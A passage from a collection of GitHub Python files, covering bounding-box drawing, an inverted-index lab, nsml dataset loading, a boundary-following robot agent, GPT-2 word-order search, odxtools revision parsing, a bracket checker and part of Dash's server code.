plt\nimport tensorflow as tf\nfrom PIL import ImageDraw\n\n\ndef draw_bboxes(imgs, bboxes):\n \"\"\"Drawing bounding boxes on given images.\n inputs:\n imgs = (batch_size, height, width, channels)\n bboxes = (batch_size, total_bboxes, [y1, x1, y2, x2])\n in normalized form [0, 1]\n \"\"\"\n colors = tf.constant([[1, 0, 0]], dtype=tf.float32)\n imgs_with_bb = tf.image.draw_bounding_boxes(imgs, bboxes, colors)\n plt.figure()\n for img_with_bb in imgs_with_bb:\n plt.imshow(img_with_bb)\n plt.show()\n\n#\n# def darw_bboxes(img, bboxes):\n# \"\"\"Drawing bounding boxes on given image.\n# inputs:\n# img = (height, width, channels)\n# bboxes = (total_bboxes, [y1, x1, y2, x2])\n# \"\"\"\n# image = tf.keras.preprocessing.image.array_to_img(img)\n# width, height = image.size\n# draw = ImageDraw.Draw(image)\n# color = (255, 0, 0, 255)\n# for index, bbox in enumerate(bboxes):\n# y1, x1, y2, x2 = tf.split(bbox, 4)\n# width = x2 - x1\n# height = y2 - y1\n# if width <= 0 or height <= 0:\n# continue\n# draw.rectangle((x1, y1, x2, y2), outline=color, width=1)\n# plt.figure()\n# plt.imshow(image)\n# plt.show()\n","repo_name":"LadaOndris/hands","sub_path":"src/detection/blazeface/utils/drawing_utils.py","file_name":"drawing_utils.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12692067776","text":"from collections import defaultdict\nfrom os import getcwd, listdir\nfrom os.path import isfile, join\nfrom math import log\nfrom nltk import RegexpTokenizer\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\n\ndef get_count(file):\n dict = {}\n\n with open(file, encoding=\"utf8\") as txt:\n tokenizer = RegexpTokenizer(r'\\w+')\n words = tokenizer.tokenize(txt.read())\n\n for word in [word.lower() for word in words]:\n if word in dict.keys():\n dict[word] += 1\n else:\n dict[word] = 1\n return dict\n\n\n\ndef get_word_index(dir_name):\n inverted_list = defaultdict(list)\n file_path = getcwd() + \"/\" + dir_name\n for i, file_name in enumerate([f for f in listdir(file_path) if isfile(join(file_path, f))]):\n for word, count in get_count(dir_name + \"/\" + file_name).items():\n inverted_list[word].append((file_name.split('.')[0], count))\n return inverted_list\n\n\ndef terms_bar_plot(inverted_list):\n doc_terms = defaultdict(list)\n for word, indexes in inverted_list.items():\n for i, iid in enumerate(indexes):\n doc_terms[iid[0]] += [word]*iid[1]\n plt.figure(figsize=(10, 5))\n plt.hist(doc_terms.values(), bins=len(inverted_list), label=doc_terms.keys())\n plt.xticks(rotation=75)\n plt.legend()\n plt.show()\n return(\"\")\n\n\ndef tokens_hist(inverted_list):\n doc_terms = defaultdict(int)\n for word, indexes in inverted_list.items():\n for i, iid in enumerate(indexes):\n doc_terms[iid[0]] += 1\n plt.figure(figsize=(10, 5))\n plt.hist(np.array(list(doc_terms.values())), bins=8)\n plt.show()\n\n\ndef idf(inverted_list):\n n_docs = len({item[0] for sublist in inverted_list.values() for item in sublist})\n return {word: log(n_docs/len(inverted_list[word])) for word in inverted_list}\n\n\ndef get_idf_stats(inverted_list):\n idf_stats, idfs = {}, idf(inverted_list)\n for word, indexes in inverted_list.items():\n idf_stats[word] = {'idf': idfs[word], 'indexes': indexes}\n return idf_stats\n\n\ndef ret_ocurrences(term, idf_stats):\n return [id[0] for id in idf_stats[term]['indexes']]\n\n\ndef ret_mul_ocurrences(terms, idf_stats):\n return [ret_ocurrences(term, idf_stats) for term in terms]\n\n\ndef similarity(query, idf_stats):\n n_docs = {item[0] for sublist in idf_stats for item in idf_stats[sublist]['indexes']}\n simmilarities = {word: 0 for word in n_docs}\n for term in query:\n for (id, freq) in idf_stats[term]['indexes']:\n simmilarities[id] += freq * idf_stats[term]['idf']\n return simmilarities\n\ndef main():\n print(\"1\\n 1.1\\n a)\")\n word_index = get_word_index(\"../lab1/brxts\")\n for word, indexes in word_index.items():\n print(f' {word:10}: {len(indexes):2}: {indexes}')\n print(\" b)\")\n print(\" 1.2\\n\", tokens_hist(word_index))\n idf_stats = get_idf_stats(word_index)\n print(\" 1.3\\n\", idf_stats)\n print(\"2\\n 2.1\\n\", ret_ocurrences('barata', idf_stats))\n print(\" 2.1\\n\", ret_mul_ocurrences(('a', 'barata', 'diz', 'que'), idf_stats))\n print(\"3\", similarity(('a', 'barata', 'diz', 'que', 'sapato'), idf_stats))\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"Jbarata98/PRI","sub_path":"lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72175628426","text":"\"\"\"Accessing datasets with nsml\n==================================\n\nMachine learning relies on data. This example shows how to upload datasets to\nthe nsml cloud as well as how to access them later for training.\n\n\"\"\"\n\nimport os\nimport numpy as np\n\n# 1. Push data\n# $ nsml dataset push diabetes data/\n# 2. Run this\n# $ nsml run 07-data_read.py -i -d diabetes\nif 'NSML_DATASET_PATH' in os.environ: # Check if the path is set\n DATASET_PATH = os.environ['NSML_DATASET_PATH']\n DATASET_NAME = os.environ['NSML_DATASET_NAME']\n\n print(DATASET_NAME, \"in\", DATASET_PATH)\n xy = np.loadtxt(os.path.join(DATASET_PATH, 'diabetes.csv'),\n delimiter=',', dtype=np.float32)\n print(xy)\nelse:\n print('DATASET_PATH is not set')\n","repo_name":"hunkim/nsmlZeroToAll","sub_path":"07-data_read.py","file_name":"07-data_read.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"81"} +{"seq_id":"7803199821","text":"import math\nfrom shapely.geometry import Point, Polygon\nimport numpy as np\n\nfrom enclosing.path_joiner import perpendicular_line\n\n\nclass Agent:\n def __init__(self, loc, theta=0.):\n (x1, y1) = loc\n # Location\n self.x, self.y = x1, y1\n # orientation\n self.theta = theta\n # Location in the curve\n self.s = None\n\n # Trajectory\n self.traj_x = [x1]\n self.traj_y = [y1]\n self.traj_t = []\n self.traj_s = []\n\n def move_on_boundary(self, boundary, vel):\n pr = Point((self.x, self.y)) # point in robot location\n circle = pr.buffer(vel).boundary # circle around robot location\n\n boundary_polygon = Polygon(boundary).boundary\n\n intersection = circle.intersection(boundary_polygon)\n\n if intersection.is_empty:\n raise ValueError('Robot slower than boundary. Robot=(%f, %f)' % (self.x, self.y))\n\n # Intersecting points\n ip_x = np.array([p.xy[0][0] for p in intersection])\n ip_y = np.array([p.xy[1][0] for p in intersection])\n\n # angle with the robot\n angs = np.arctan2(ip_y - self.y, ip_x - self.x)\n # Convert to positive angles\n d = np.abs(self.theta - angs)\n d[d > math.pi] = np.abs(d[d > math.pi] - 2 * math.pi)\n\n #min_index = d.index(min(d))\n min_index = np.argmin(d)\n\n ## select from intersected points\n # p1, p2 = np.array(intersection[0].xy), np.array(intersection[1].xy)\n # distance to the second last point\n # a1 = math.atan2((p1[1] - self.y), (p1[0] - self.x))\n # a2 = math.atan2((p2[1] - self.y), (p2[0] - self.x))\n ## convert to positive angles\n # d1 = abs(self.theta - a1)\n # d2 = abs(self.theta - a2)\n # d1 = d1 if d1 < math.pi else abs(d1 - 2 * math.pi)\n # d2 = d2 if d2 < math.pi else abs(d2 - 2 * math.pi)\n # r = intersection[0] if d1 < d2 else intersection[1]\n # nx, ny = r.xy\n # self.x = nx[0]\n # self.y = ny[0]\n\n nx, ny = ip_x[min_index], ip_y[min_index]\n\n self.x = nx\n self.y = ny\n\n self.traj_x.append(nx)\n self.traj_y.append(ny)\n\n # Orientation between 0 and 2pi\n self.theta = math.atan2(self.traj_y[-1] - self.traj_y[-2],\n self.traj_x[-1] - self.traj_x[-2]) % (2 * math.pi)\n","repo_name":"dsaldana/boundary-estimation","sub_path":"enclosing/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70116217226","text":"import argparse\nimport os\nimport sys\nsys.path.append('../')\nimport src.utils as utils\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('--dir', required=False,\n default='../results/classifier/2000_0.5_eval_alphas.txt.gz/',\n type=str)\n args = parser.parse_args()\n print(\"The command line arguments were \", args)\n\n in_dir = args.dir\n out_dir = os.path.join(in_dir, \"official_format\")\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n for file_path in os.listdir(in_dir):\n\n if file_path.find(\".txt\") != -1:\n in_file = open(os.path.join(in_dir, file_path), 'r')\n out_file = open(os.path.join(out_dir, file_path), 'w')\n for line in in_file:\n text = line[2:]\n text = text.replace(\"_d\", \".d\")\n out_file.write(text)\n out_file.close()\n\n print(\"Postprocessing finished...\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Zsaknadrag/interpretability","sub_path":"src/contextual/postproc_classifier.py","file_name":"postproc_classifier.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15730334095","text":"from reorder import evaluate_files\n\nimport gc\nimport numpy as np\nimport torch as T\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\nimport time\nfrom tqdm import tqdm\nimport os\n\n\ndef score(model, padded):\n outputs = model(padded)\n\n lsm = -outputs[0].log_softmax(2)\n preds = T.zeros_like(lsm)\n preds[:, 1:] = lsm[:, :-1]\n wordscores = preds.gather(2, padded.unsqueeze(2)).squeeze(2)\n scores = wordscores.sum(1)\n\n return scores.cpu(), wordscores.cpu(), -preds.cpu()\n\n\ncand_orders = {3: [[1, 3, 2, 4]],\n 4: [[1, 4, 3, 2, 5]],\n 5: [[1, 3, 2, 5, 4, 6], [1, 3, 5, 2, 4, 6], [1, 3, 5, 4, 2, 6], [1, 4, 2, 5, 3, 6], [1, 4, 3, 5, 2, 6],\n [1, 5, 4, 3, 2, 6], [1, 5, 2, 4, 3, 6], [1, 5, 3, 2, 4, 6]]}\n\n\ndef shuffle_proposals(mat, topk, bs, kopt):\n L = mat.shape[0]\n\n I = T.zeros((kopt,) + (L,) * (kopt)).long()\n for i in range(kopt):\n I[i] = T.arange(L).view((-1,) + (1,) * (kopt - 1 - i))\n\n mask = (0 < I[0])\n for i in range(kopt - 1):\n mask *= (I[i] < I[i + 1])\n\n lv = mat.view(-1)\n\n orders = cand_orders[kopt]\n\n o = np.array(orders[np.random.randint(len(orders))])\n then = T.zeros((L,) * kopt)\n now = T.zeros_like(then)\n for i in range(kopt):\n now += lv[L * I[i] + I[i]]\n then += lv[L * I[o[i] - 1] + I[o[i + 1] - 2]]\n\n A = then - now\n\n A[~mask] = -1001\n\n topv, topi = A.view(-1).topk(min(A.numel(), topk))\n indices = np.random.randint(topi.shape[0], size=(bs,))\n topv = topv[indices]\n topi = topi[indices]\n\n orders = [o] * bs\n\n imod = [(topi // L ** (kopt - 1 - i)) % L for i in range(kopt)]\n\n return T.stack(imod, -1), topv, orders\n\n\ndef ibis(model, device, before, sentence, after, bs, topk, its, patience, warminit=False, gluemask=None):\n sent = sentence\n\n padded = T.cat([before, sent, after], 0).unsqueeze(0).to(device)\n\n zz = score(model, padded)\n orscore = zz[0][0]\n yield orscore\n\n bestscore = zz[0][0]\n\n bestsc = zz[2][0]\n\n lfix, rfix, blanks = before.shape[0] - 1, after.shape[0] - 1, 0\n\n permsents = [T.cat([before, T.from_numpy((sent.numpy())), after], 0) for _ in range(bs)]\n\n bestmask = np.full(permsents[0].shape, True)\n\n if gluemask is not None: bestmask[lfix + 1:-rfix - 1] = gluemask\n\n permmasks = [bestmask.copy() for _ in range(bs)]\n\n if not warminit:\n seg = list(np.nonzero(bestmask[lfix + 1:-rfix - 1])[0]) + [len(sent)]\n for b in range(bs):\n perm = np.random.permutation(len(seg) - 1)\n ns = []\n nm = []\n for i in range(len(seg) - 1):\n ns.append(sent[seg[perm[i]]:seg[perm[i] + 1]])\n nm.append(bestmask[lfix + 1:-rfix - 1][seg[perm[i]]:seg[perm[i] + 1]])\n permsents[b][lfix + 1:-rfix - 1] = T.cat(ns, 0)\n permmasks[b][lfix + 1:-rfix - 1] = np.concatenate(nm, 0)\n\n padded = T.stack(permsents, 0).to(device)\n\n bestsent = np.zeros(padded[0].shape)\n\n bestscore = 1000000\n movetype = 'init'\n nch = 0\n candidates = np.array([1] * bs)\n last_imp = 0\n for it in range(its):\n\n gc.collect()\n\n if it - last_imp > patience: break\n\n sc, wsc, spr = score(model, padded)\n\n if it == 0: bestwsc = wsc[0]\n\n sc = sc.numpy()\n\n if sc.min() < bestscore:\n if it == 0 or np.any(permsents[sc.argmin()] != bestsent):\n\n nch += 1\n\n bestsent, bestscore, bestsc, bestwsc, bestmask = permsents[sc.argmin()], sc.min(), spr[sc.argmin()], \\\n wsc[sc.argmin()], permmasks[sc.argmin()]\n\n if type(bestsent) == T.Tensor: bestsent = bestsent.numpy()\n\n last_imp = it\n\n yield (it, movetype, bestscore, bestsent, bestmask)\n\n thespr = bestsc\n\n kopt = np.random.randint(3, 6)\n\n cutprobs = np.ones_like(bestwsc)\n\n cutprobs[~bestmask] = 0.\n\n cutprobs[lfix] = 100\n cutprobs[-1 - rfix] = 100\n\n if it % 2 == 0 and len(bestsent) - lfix - rfix > 6:\n ncand = bestmask[lfix:len(bestsent) - rfix].sum()\n\n if kopt == 4: ncand = min(40, ncand)\n if kopt == 5: ncand = min(20, ncand)\n\n l, r = lfix, len(bestsent) - rfix\n candidates = np.random.choice(np.arange(l, r), replace=False, p=cutprobs[l:r] / cutprobs[l:r].sum(),\n size=(ncand,))\n candidates.sort()\n\n movetype = f'GS {kopt}'\n\n else:\n\n ropt = np.random.randint(7, 15)\n\n try:\n start = np.random.randint(lfix + 1, len(bestsent) - ropt - rfix)\n\n l, r = start, start + ropt\n\n candidates = np.random.choice(np.arange(l, r), replace=False, p=cutprobs[l:r] / cutprobs[l:r].sum(),\n size=(min(ropt, (cutprobs[l:r] > 0).sum()),))\n\n except:\n ropt = min(15, len(bestsent) - lfix - rfix - 2)\n start = np.random.randint(lfix + 1, max(lfix + 2, len(bestsent) - ropt - rfix))\n\n l, r = start, start + ropt\n candidates = np.random.choice(np.arange(l, r), replace=False, p=cutprobs[l:r] / cutprobs[l:r].sum(),\n size=(min(ropt, (cutprobs[l:r] > 0).sum()),))\n\n candidates.sort()\n\n movetype = f'LS {kopt}'\n\n links = thespr[:, bestsent[candidates]][candidates]\n\n permsents = []\n permmasks = []\n\n i, v, o = shuffle_proposals(links, topk, bs, kopt)\n\n for j in range(bs):\n inds = [candidates[0]] + list(candidates[i[j]]) + [candidates[-1]]\n if v[j] > -1000:\n pieces = [bestsent[:inds[0]]]\n maskpieces = [bestmask[:inds[0]]]\n for k in range(kopt + 1):\n pieces.append(bestsent[inds[o[j][k] - 1]:inds[o[j][k]]])\n maskpieces.append(bestmask[inds[o[j][k] - 1]:inds[o[j][k]]])\n pieces.append(bestsent[inds[-1]:])\n newsent = np.concatenate(pieces, 0)\n maskpieces.append(bestmask[inds[-1]:])\n newmask = np.concatenate(maskpieces, 0)\n else:\n newsent, newmask = bestsent, bestmask\n\n permsents.append(newsent)\n permmasks.append(newmask)\n\n padded = T.stack(list(map(T.from_numpy, permsents)), 0).to(device)\n\n\ndef ibis_algorithm(s, model_name = 'gpt2'):\n T.set_grad_enabled(False)\n\n b = 128\n B = 512\n max_steps = 1024\n patience = 128\n\n device = T.device('cuda')\n tokenizer = AutoTokenizer.from_pretrained(model_name)\n model = AutoModelForCausalLM.from_pretrained(model_name).to(device)\n\n vocab = tokenizer.get_vocab()\n vocab = {vocab[i]: i for i in vocab}\n V = len(vocab)\n\n unbreakable = np.zeros((V,))\n for v in range(V):\n unbreakable[v] = vocab[v][0].lower() in 'abcdefghijklmnopqrstuvwxyz'\n\n print(f'Loaded model {model_name}')\n\n sentence = T.LongTensor(tokenizer.encode(s))\n before = T.LongTensor(tokenizer.encode('<|endoftext|>')) # ],return_tensors='pt').input_ids[0]\n after = T.LongTensor(tokenizer.encode('<|endoftext|>')) # ],return_tensors='pt').input_ids[0]\n\n mask = (1 - unbreakable[sentence])\n mask[0] = 1\n\n last = '-----'\n for nch, k in enumerate(ibis(model, device, before, sentence, after, b, B, max_steps, patience, False, mask)):\n if nch == 0:\n starting = k.item()\n print('Original order NLL = ', starting)\n else:\n print(k[0], k[1], k[2], tokenizer.decode(k[3][1:-1], clean_up_tokenization_spaces=False))\n last = tokenizer.decode(k[3][1:-1], clean_up_tokenization_spaces=False)\n\n else:\n return last\n\n###############################################################################\ndef order_ibis(test_file):\n dev_file = os.path.splitext(test_file)[0] + '.dev'\n ref_file = os.path.splitext(test_file)[0] + '.ref'\n print(test_file, dev_file, ref_file)\n\n\n with open(test_file, encoding='utf-8') as test, \\\n open(dev_file, 'w', encoding='utf-8') as dev:\n sentences = test.read().split('\\n')[:-1] # remove the final blank line\n for sent in tqdm(sentences):\n prediction = ibis_algorithm(sent)\n dev.write(prediction + '\\n')\n dev.flush()\n score = evaluate_files(ref_file, dev_file)\n print(score)\n return score\n\n\n################################################# EXECUTION CODE #################################################\ndev_data_folder = 'dev_data/'\n\n\ndef main():\n inference_times =[]\n all_metrics = []\n\n test_files = ['dev_data/news.test', 'dev_data/hans.test', 'dev_data/euro.test'] # input\n refs_files = ['dev_data/news.ref', 'dev_data/hans.ref', 'dev_data/euro.ref'] # references\n\n for test_file in test_files:\n t = time.time()\n metrics = order_ibis(test_file)\n inference_times.append(time.time()-t)\n all_metrics.append(metrics)\n print('One file finished')\n\n print(test_files)\n print(inference_times)\n print(all_metrics)\n\n\nif __name__ == '__main__':\n main()","repo_name":"KacemKhaled/IFT6285-NLP-Project2","sub_path":"ibis.py","file_name":"ibis.py","file_ext":"py","file_size_in_byte":9247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40076652447","text":"# SPDX-License-Identifier: MIT\nfrom dataclasses import dataclass\nfrom typing import TYPE_CHECKING, Any, Dict, List, Optional\nfrom xml.etree import ElementTree\n\nfrom .companyrevisioninfo import CompanyRevisionInfo\nfrom .exceptions import odxrequire\nfrom .modification import Modification\nfrom .odxlink import OdxDocFragment, OdxLinkDatabase, OdxLinkId, OdxLinkRef\nfrom .teammember import TeamMember\n\nif TYPE_CHECKING:\n from .diaglayer import DiagLayer\n\n\n@dataclass\nclass DocRevision:\n \"\"\"\n Representation of a single revision of the relevant object.\n \"\"\"\n\n date: str\n team_member_ref: Optional[OdxLinkRef]\n revision_label: Optional[str]\n state: Optional[str]\n tool: Optional[str]\n company_revision_infos: List[CompanyRevisionInfo]\n modifications: List[Modification]\n\n @property\n def team_member(self) -> Optional[TeamMember]:\n return self._team_member\n\n @staticmethod\n def from_et(et_element: ElementTree.Element, doc_frags: List[OdxDocFragment]) -> \"DocRevision\":\n\n team_member_ref = OdxLinkRef.from_et(et_element.find(\"TEAM-MEMBER-REF\"), doc_frags)\n revision_label = et_element.findtext(\"REVISION-LABEL\")\n state = et_element.findtext(\"STATE\")\n date = odxrequire(et_element.findtext(\"DATE\"))\n tool = et_element.findtext(\"TOOL\")\n\n crilist = [\n CompanyRevisionInfo.from_et(cri_elem, doc_frags)\n for cri_elem in et_element.iterfind(\"COMPANY-REVISION-INFOS/\"\n \"COMPANY-REVISION-INFO\")\n ]\n\n modlist = [\n Modification.from_et(mod_elem, doc_frags)\n for mod_elem in et_element.iterfind(\"MODIFICATIONS/MODIFICATION\")\n ]\n\n return DocRevision(\n team_member_ref=team_member_ref,\n revision_label=revision_label,\n state=state,\n date=date,\n tool=tool,\n company_revision_infos=crilist,\n modifications=modlist,\n )\n\n def _build_odxlinks(self) -> Dict[OdxLinkId, Any]:\n return {}\n\n def _resolve_odxlinks(self, odxlinks: OdxLinkDatabase) -> None:\n self._team_member: Optional[TeamMember] = None\n if self.team_member_ref is not None:\n self._team_member = odxlinks.resolve(self.team_member_ref, TeamMember)\n\n for cri in self.company_revision_infos:\n cri._resolve_odxlinks(odxlinks)\n\n for mod in self.modifications:\n mod._resolve_odxlinks(odxlinks)\n\n def _resolve_snrefs(self, diag_layer: \"DiagLayer\") -> None:\n for cri in self.company_revision_infos:\n cri._resolve_snrefs(diag_layer)\n\n for mod in self.modifications:\n mod._resolve_snrefs(diag_layer)\n","repo_name":"mercedes-benz/odxtools","sub_path":"odxtools/docrevision.py","file_name":"docrevision.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"81"} +{"seq_id":"41110040158","text":"def areBracketsBalanced(expr):\n stack = []\n for char in expr:\n if char in [\"(\", \"{\", \"[\"]:\n stack.append(char)\n elif char not in [\")\", \"}\", \"]\"]:\n # means its a letter and not a bracket so do nothing\n None\n else:\n if not stack:\n return False\n # its opposite bracket.\n current_char = stack.pop()\n if current_char == '{':\n if char != \"}\":\n return False\n if current_char == '(':\n if char != \")\":\n return False\n if current_char == '[':\n if char != \"]\":\n return False\n\n if stack:\n return False\n else:\n return True\n\n\nif __name__ == '__main__':\n expr = \"{asd()dfs}sd[]\"\n if areBracketsBalanced(expr):\n print(\"balanced\")\n else:\n print(\"not balanced\")\n","repo_name":"nfonjeannoel/balancedbrackerts","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4701815611","text":"import random;\nimport matplotlib.pyplot as plt\n\nnums = [];\nvalues = [];\n\ntryCount = 500000;\ni = 2;\nwhile (i < 21):\n j = 0;\n deathRate = 0;\n while (j < tryCount):\n position = -2;\n k = 0;\n while (k < i):\n number = random.randint(1, 3);\n if (number == 1):\n position = position + 1;\n else:\n position = position - 1;\n\n if (position >= 0):\n deathRate = deathRate + 1;\n break;\n k = k + 1;\n\n j = j + 1;\n\n nums.append(i);\n values.append(deathRate / tryCount);\n\n i = i + 2;\n\nplt.plot(nums, values);\nplt.show()\n\nprint (nums);\nprint (values);\n","repo_name":"Giperkot/stage-12","sub_path":"third/bad var/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24508075611","text":"from __future__ import print_function\n\nimport sys\nimport collections\nimport importlib\nimport json\nimport pkgutil\nimport warnings\nfrom functools import wraps\n\nimport plotly\nimport dash_renderer\nimport flask\nfrom flask import Flask, Response\nfrom flask_compress import Compress\n\nfrom .dependencies import Event, Input, Output, State\nfrom .resources import Scripts, Css\nfrom .development.base_component import Component\nfrom . import exceptions\nfrom ._utils import AttributeDict as _AttributeDict\n\n\n# pylint: disable=too-many-instance-attributes\n# pylint: disable=too-many-arguments\nclass Dash(object):\n def __init__(\n self,\n name='__main__',\n server=None,\n static_folder='static',\n url_base_pathname='/',\n compress=True,\n **kwargs):\n\n # pylint-disable: too-many-instance-attributes\n if 'csrf_protect' in kwargs:\n warnings.warn('''\n `csrf_protect` is no longer used,\n CSRF protection has been removed as it is no longer\n necessary.\n See https://github.com/plotly/dash/issues/141 for details.\n ''', DeprecationWarning)\n\n name = name or 'dash'\n # allow users to supply their own flask server\n self.server = server or Flask(name, static_folder=static_folder)\n\n self.url_base_pathname = url_base_pathname\n self.config = _AttributeDict({\n 'suppress_callback_exceptions': False,\n 'routes_pathname_prefix': url_base_pathname,\n 'requests_pathname_prefix': url_base_pathname\n })\n\n # list of dependencies\n self.callback_map = {}\n\n if compress:\n # gzip\n Compress(self.server)\n\n @self.server.errorhandler(exceptions.PreventUpdate)\n def _handle_error(error):\n \"\"\"Handle a halted callback and return an empty 204 response\"\"\"\n print(error, file=sys.stderr)\n return ('', 204)\n\n # static files from the packages\n self.css = Css()\n self.scripts = Scripts()\n self.registered_paths = {}\n\n # urls\n\n def add_url(name, view_func, methods=('GET',)):\n self.server.add_url_rule(\n name,\n view_func=view_func,\n endpoint=name,\n methods=list(methods)\n )\n\n add_url(\n '{}_dash-layout'.format(self.config['routes_pathname_prefix']),\n self.serve_layout)\n\n add_url(\n '{}_dash-dependencies'.format(\n self.config['routes_pathname_prefix']),\n self.dependencies)\n\n add_url(\n '{}_dash-update-component'.format(\n self.config['routes_pathname_prefix']),\n self.dispatch,\n ['POST'])\n\n add_url((\n '{}_dash-component-suites'\n '/'\n '/').format(\n self.config['routes_pathname_prefix']),\n self.serve_component_suites)\n\n add_url(\n '{}_dash-routes'.format(self.config['routes_pathname_prefix']),\n self.serve_routes)\n\n add_url(\n self.config['routes_pathname_prefix'],\n self.index)\n\n # catch-all for front-end routes\n add_url(\n '{}'.format(self.config['routes_pathname_prefix']),\n self.index)\n\n self.server.before_first_request(self._setup_server)\n\n self._layout = None\n self._cached_layout = None\n self.routes = []\n\n @property\n def layout(self):\n return self._layout\n\n def _layout_value(self):\n if isinstance(self._layout, collections.Callable):\n self._cached_layout = self._layout()\n else:\n self._cached_layout = self._layout\n return self._cached_layout\n\n @layout.setter\n def layout(self, value):\n if (not isinstance(value, Component) and\n not isinstance(value, collections.Callable)):\n raise Exception(\n ''\n 'Layout must be a dash component '\n 'or a function that returns '\n 'a dash component.')\n\n self._layout = value\n\n layout_value = self._layout_value()\n # pylint: disable=protected-access\n self.css._update_layout(layout_value)\n self.scripts._update_layout(layout_value)\n self._collect_and_register_resources(\n self.scripts.get_all_scripts()\n )\n self._collect_and_register_resources(\n self.css.get_all_css()\n )\n\n def serve_layout(self):\n layout = self._layout_value()\n\n # TODO - Set browser cache limit - pass hash into frontend\n return flask.Response(\n json.dumps(layout,\n cls=plotly.utils.PlotlyJSONEncoder),\n mimetype='application/json'\n )\n\n def _config(self):\n return {\n 'url_base_pathname': self.url_base_pathname,\n 'requests_pathname_prefix': self.config['requests_pathname_prefix']\n }\n\n def serve_routes(self):\n return flask.Response(\n json.dumps(self.routes,\n cls=plotly.utils.PlotlyJSONEncoder),\n mimetype='application/json'\n )\n\n def _collect_and_register_resources(self, resources):\n # template in the necessary component suite JS bundles\n # add the version number of the package as a query parameter\n # for cache busting\n def _relative_url_path(relative_package_path='', namespace=''):\n\n # track the registered packages\n if namespace in self.registered_paths:\n self.registered_paths[namespace].append(relative_package_path)\n else:\n self.registered_paths[namespace] = [relative_package_path]\n\n return '{}_dash-component-suites/{}/{}?v={}'.format(\n self.config['routes_pathname_prefix'],\n namespace,\n relative_package_path,\n importlib.import_module(namespace).__version__\n )\n\n srcs = []\n for resource in resources:\n if 'relative_package_path' in resource:\n if isinstance(resource['relative_package_path'], str):\n srcs.append(_relative_url_path(**resource))\n else:\n for rel_path in resource['relative_package_path']:\n srcs.append(_relative_url_path(\n relative_package_path=rel_path,\n namespace=resource['namespace']\n ))\n elif 'external_url' in resource:\n if isinstance(resource['external_url'], str):\n srcs.append(resource['external_url'])\n else:\n for url in resource['external_url']:\n srcs.append(url)\n elif 'absolute_path' in resource:\n raise Exception(\n 'Serving files form absolute_path isn\\'t supported yet'\n )\n return srcs\n\n def _generate_css_dist_html(self):\n links = self._collect_and_register_resources(\n self.css.get_all_css()\n )\n return '\\n'.join([\n ''.format(link)\n for link in links\n ])\n\n def _generate_scripts_html(self):\n # Dash renderer has dependencies like React which need to be rendered\n # before every other script. However, the dash renderer bundle\n # itself needs to be rendered after all of the component's\n # scripts have rendered.\n # The rest of the scripts can just be loaded after React but before\n # dash renderer.\n # pylint: disable=protected-access\n srcs = self._collect_and_register_resources(\n self.scripts._resources._filter_resources(\n dash_renderer._js_dist_dependencies\n ) +\n self.scripts.get_all_scripts() +\n self.scripts._resources._filter_resources(\n dash_renderer._js_dist\n )\n )\n\n return '\\n'.join([\n ''.format(src)\n for src in srcs\n ])\n\n def _generate_config_html(self):\n return (\n ''\n ).format(json.dumps(self._config()))\n\n # Serve the JS bundles for each package\n def serve_component_suites(self, package_name, path_in_package_dist):\n if package_name not in self.registered_paths:\n raise Exception(\n 'Error loading dependency.\\n'\n '\"{}\" is not a registered library.\\n'\n 'Registered libraries are: {}'\n .format(package_name, list(self.registered_paths.keys())))\n\n elif path_in_package_dist not in self.registered_paths[package_name]:\n raise Exception(\n '\"{}\" is registered but the path requested is not valid.\\n'\n 'The path requested: \"{}\"\\n'\n 'List of registered paths: {}'\n .format(\n package_name,\n path_in_package_dist,\n self.registered_paths\n )\n )\n\n mimetype = ({\n 'js': 'application/JavaScript',\n 'css': 'text/css'\n })[path_in_package_dist.split('.')[-1]]\n return Response(\n pkgutil.get_data(package_name, path_in_package_dist),\n mimetype=mimetype\n )\n\n def index(self, *args, **kwargs): # pylint: disable=unused-argument\n scripts = self._generate_scripts_html()\n css = self._generate_css_dist_html()\n config = self._generate_config_html()\n title = getattr(self, 'title', 'Dash')\n return '''\n \n \n \n \n {}\n {}\n \n \n
\n
\n Loading...\n
\n
\n
\n {}\n {}\n
\n \n \n '''.format(title, css, config, scripts)\n\n def dependencies(self):\n return flask.jsonify([\n {\n 'output': {\n 'id': k.split('.')[0],\n 'property': k.split('.')[1]\n },\n 'inputs': v['inputs'],\n 'state': v['state'],\n 'events': v['events']\n } for k, v in list(self.callback_map.items())\n ])\n\n # pylint: disable=unused-argument, no-self-use\n def react(self, *args, **kwargs):\n raise exceptions.DashException(\n 'Yo! `react` is no longer used. \\n'\n 'Use `callback` instead. `callback` has a new syntax too, '\n 'so make sure to call `help(app.callback)` to learn more.')\n\n def _validate_callback(self, output, inputs, state, events):\n # pylint: disable=too-many-branches\n layout = self._cached_layout or self._layout_value()\n\n if (layout is None and\n not self.config.first('suppress_callback_exceptions',\n 'supress_callback_exceptions')):\n # Without a layout, we can't do validation on the IDs and\n # properties of the elements in the 